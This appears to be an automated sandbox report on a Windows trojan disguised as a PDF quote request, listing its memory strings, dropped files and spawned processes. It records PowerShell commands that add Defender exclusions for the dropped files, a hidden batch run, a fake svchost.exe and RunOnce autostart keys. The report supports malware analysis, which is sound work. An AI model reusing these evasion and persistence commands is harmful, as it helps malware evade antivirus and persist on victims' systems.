                      Source: RFQ - REF 208056-pdf.exe, 00000000.00000002.492361781.000000000395D000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.554662869.0000000007201000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0D
                      Source: svchost.exe, 00000005.00000002.307284356.00000243FF03E000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                      Source: svchost.exe, 00000005.00000002.307284356.00000243FF03E000.00000004.00000001.sdmp, svchost.exe, 00000005.00000002.307256810.00000243FF013000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                      Source: svchost.exe, 00000005.00000003.307045052.00000243FF046000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 00000005.00000003.307045052.00000243FF046000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 00000005.00000002.307267041.00000243FF029000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                      Source: svchost.exe, 00000005.00000003.285270099.00000243FF031000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                      Source: svchost.exe, 00000005.00000003.307003492.00000243FF04D000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                      Source: RFQ - REF 208056-pdf.exe, 00000000.00000002.543172698.0000000005AF0000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                      Source: RFQ - REF 208056-pdf.exe, 00000000.00000002.509634686.0000000003B23000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.544302148.000000000477A000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip

                      System Summary:

                      barindex
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeCode function: 0_2_022E0BA0 NtSetInformationThread,
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeFile created: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsOJump to behavior
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeCode function: 0_2_022E2750
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeCode function: 0_2_0237C2F0
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeCode function: 0_2_023793F0
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeCode function: 0_2_08100040
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeCode function: 0_2_0810000A
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0357B348
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_035785C0
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0357CAB0
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0357F9C8
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0357A9B8
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0357ECA4
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_03577210
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_03575797
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_035757A8
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_03577680
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0357F9C8
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_03578DF0
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0357A9B8
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_03580390
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_03582B08
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_03582B08
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_03582B08
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_03582B08
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_03582B08
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_035889BB
                      Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exeCode function: 16_2_059EB1F4
                      Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exeCode function: 16_2_059EB1E8
                      Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exeCode function: 16_2_059E93F0
                      Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exeCode function: 16_2_059EDFB0
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_0378C920
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_0378EA2F
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_0827EC58
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_08278DA8
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_08278D99
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_0827A427
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_0827A438
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_08273D83
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_08273D90
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_08307E00
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_08307E00
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_089EE5A0
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_089ED730
                      Source: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exeCode function: String function: 0040B550 appears 50 times
                      Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6556 -ip 6556
                      Source: RFQ - REF 208056-pdf.exeStatic PE information: invalid certificate
                      Source: AdvancedRun.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: AdvancedRun.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: RFQ - REF 208056-pdf.exe, 00000000.00000002.492361781.000000000395D000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRunPeBraba.dll6 vs RFQ - REF 208056-pdf.exe
                      Source: RFQ - REF 208056-pdf.exe, 00000000.00000002.492361781.000000000395D000.00000004.00000001.sdmpBinary or memory string: ,@shell32.dllSHGetSpecialFolderPathWshlwapi.dllSHAutoComplete%2.2X%2.2X%2.2X&lt;&gt;&quot;&deg;&amp;<br><font size="%d" color="#%s"><b></b>\StringFileInfo\\VarFileInfo\Translation%4.4X%4.4X040904E4ProductNameFileDescriptionFileVersionProductVersionCompanyNameInternalNameLegalCopyrightOriginalFileNameRSDSu vs RFQ - REF 208056-pdf.exe
                      Source: RFQ - REF 208056-pdf.exe, 00000000.00000002.492361781.000000000395D000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAdvancedRun.exe8 vs RFQ - REF 208056-pdf.exe
                      Source: RFQ - REF 208056-pdf.exe, 00000000.00000002.543316412.0000000005C30000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs RFQ - REF 208056-pdf.exe
                      Source: RFQ - REF 208056-pdf.exe, 00000000.00000002.543447459.0000000005C80000.00000002.00000001.sdmpBinary or memory string: originalfilename vs RFQ - REF 208056-pdf.exe
                      Source: RFQ - REF 208056-pdf.exe, 00000000.00000002.543447459.0000000005C80000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs RFQ - REF 208056-pdf.exe
                      Source: RFQ - REF 208056-pdf.exe, 00000000.00000000.228993123.000000000006E000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTEwJVelt.exe2 vs RFQ - REF 208056-pdf.exe
                      Source: RFQ - REF 208056-pdf.exe, 00000000.00000002.509634686.0000000003B23000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameIoxb OTf.exe2 vs RFQ - REF 208056-pdf.exe
                      Source: RFQ - REF 208056-pdf.exe, 00000000.00000002.401077790.00000000022F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs RFQ - REF 208056-pdf.exe
                      Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dll
                      Source: C:\Windows\explorer.exeSection loaded: ninput.dll
                      Source: C:\Windows\explorer.exeSection loaded: ninput.dll
                      Source: classification engineClassification label: mal100.troj.evad.winEXE@37/15@3/3
                      Source: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exeCode function: 11_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,
                      Source: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exeCode function: 13_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,
                      Source: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exeCode function: 11_2_004095FD CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,
                      Source: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exeCode function: 11_2_0040A33B FindResourceW,SizeofResource,LoadResource,LockResource,
                      Source: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exeCode function: 11_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20210225Jump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6216:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6440:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2720:120:WilError_01
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeFile created: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3Jump to behavior
                      Source: unknownProcess created: C:\Windows\explorer.exe
                      Source: unknownProcess created: C:\Windows\explorer.exe
                      Source: unknownProcess created: C:\Windows\explorer.exe
                      Source: unknownProcess created: C:\Windows\explorer.exe
                      Source: RFQ - REF 208056-pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: RFQ - REF 208056-pdf.exeVirustotal: Detection: 18%
                      Source: RFQ - REF 208056-pdf.exeReversingLabs: Detection: 31%
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeFile read: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe 'C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe'
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                      Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe' -Force
                      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe' /SpecialRun 4101d8 5504
                      Source: unknownProcess created: C:\Windows\explorer.exe 'C:\Windows\explorer.exe' 'C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe'
                      Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                      Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe 'C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe'
                      Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe' -Force
                      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: unknownProcess created: C:\Windows\explorer.exe 'C:\Windows\explorer.exe' 'C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe'
                      Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                      Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe 'C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe'
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                      Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6556 -ip 6556
                      Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6556 -s 2200
                      Source: unknownProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe' -Force
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeProcess created: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe' -Force
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeProcess created: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                      Source: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe' /SpecialRun 4101d8 5504
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe 'C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe'
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: RFQ - REF 208056-pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: RFQ - REF 208056-pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: RFQ - REF 208056-pdf.exe, 00000000.00000002.492361781.000000000395D000.00000004.00000001.sdmp, AdvancedRun.exe, 0000000B.00000000.311587089.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000000D.00000000.329692687.000000000040C000.00000002.00020000.sdmp, svchost.exe, 00000010.00000002.554662869.0000000007201000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: RFQ - REF 208056-pdf.exe, 00000000.00000002.543172698.0000000005AF0000.00000004.00000001.sdmp
                      Source: Binary string: C:\Users\user\Desktop\RFQ - REF 208056-pdf.PDB source: RFQ - REF 208056-pdf.exe, 00000000.00000002.394246360.00000000004F9000.00000004.00000010.sdmp
                      Source: Binary string: OnpeiVisualBasic.pdb source: RFQ - REF 208056-pdf.exe, 00000000.00000002.394246360.00000000004F9000.00000004.00000010.sdmp
                      Source: Binary string: O.pdb3X source: RFQ - REF 208056-pdf.exe, 00000000.00000002.394246360.00000000004F9000.00000004.00000010.sdmp
                      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: RFQ - REF 208056-pdf.exe, 00000000.00000002.543172698.0000000005AF0000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbA source: RFQ - REF 208056-pdf.exe, 00000000.00000002.543172698.0000000005AF0000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdbn source: RFQ - REF 208056-pdf.exe, 00000000.00000002.543172698.0000000005AF0000.00000004.00000001.sdmp
                      Source: Binary string: hhRFQ - REF 208056-pdf.PDB source: RFQ - REF 208056-pdf.exe, 00000000.00000002.394246360.00000000004F9000.00000004.00000010.sdmp
                      Source: Binary string: System.Management.Automation.pdb-4053062332-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer3215EBB53FAC1131AE0BD333C5EE6021672D9718EA31A8AEBD0DA0072F25D87DBA6FC90FFD598ED4DA35E44C398C454307E8E33B8426143DAEC9F596836F97C8F7479F source: powershell.exe, 00000011.00000002.548053273.0000000008392000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: RFQ - REF 208056-pdf.exe, 00000000.00000002.543172698.0000000005AF0000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\mscorlib.pdb^ source: RFQ - REF 208056-pdf.exe, 00000000.00000002.543172698.0000000005AF0000.00000004.00000001.sdmp

                      Data Obfuscation:

                      barindex
                      Binary contains a suspicious time stampShow sources
                      Source: initial sampleStatic PE information: 0x85456217 [Wed Nov 7 16:00:23 2040 UTC]
                      Source: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exeCode function: 11_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeCode function: 0_2_0237E040 push 00000025h; retf
                      Source: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exeCode function: 11_2_0040B550 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exeCode function: 11_2_0040B550 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exeCode function: 11_2_0040B50D push ecx; ret
                      Source: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exeCode function: 13_2_0040B550 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exeCode function: 13_2_0040B550 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exeCode function: 13_2_0040B50D push ecx; ret
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_0378BE90 push es; ret
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_08273BA8 pushad ; ret
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_0830FE40 push eax; mov dword ptr [esp], edx
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_0830F861 push 00000007h; ret
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_0830FEF8 push eax; mov dword ptr [esp], edx

                      Persistence and Installation Behavior:

                      barindex
                      Drops PE files with benign system namesShow sources
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeFile created: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exeJump to dropped file
                      Drops executables to the windows directory (C:\Windows) and starts themShow sources
                      Source: C:\Windows\explorer.exeExecutable created and started: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeFile created: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exeJump to dropped file
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeFile created: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exeJump to dropped file
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeFile created: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exeJump to dropped file

                      Boot Survival:

                      barindex
                      Creates an autostart registry key pointing to binary in C:\WindowsShow sources
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce XZFSGXzndMljLVEovPfqdSJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exeCode function: 11_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce XZFSGXzndMljLVEovPfqdSJump to behavior
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce XZFSGXzndMljLVEovPfqdSJump to behavior
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce XZFSGXzndMljLVEovPfqdSJump to behavior
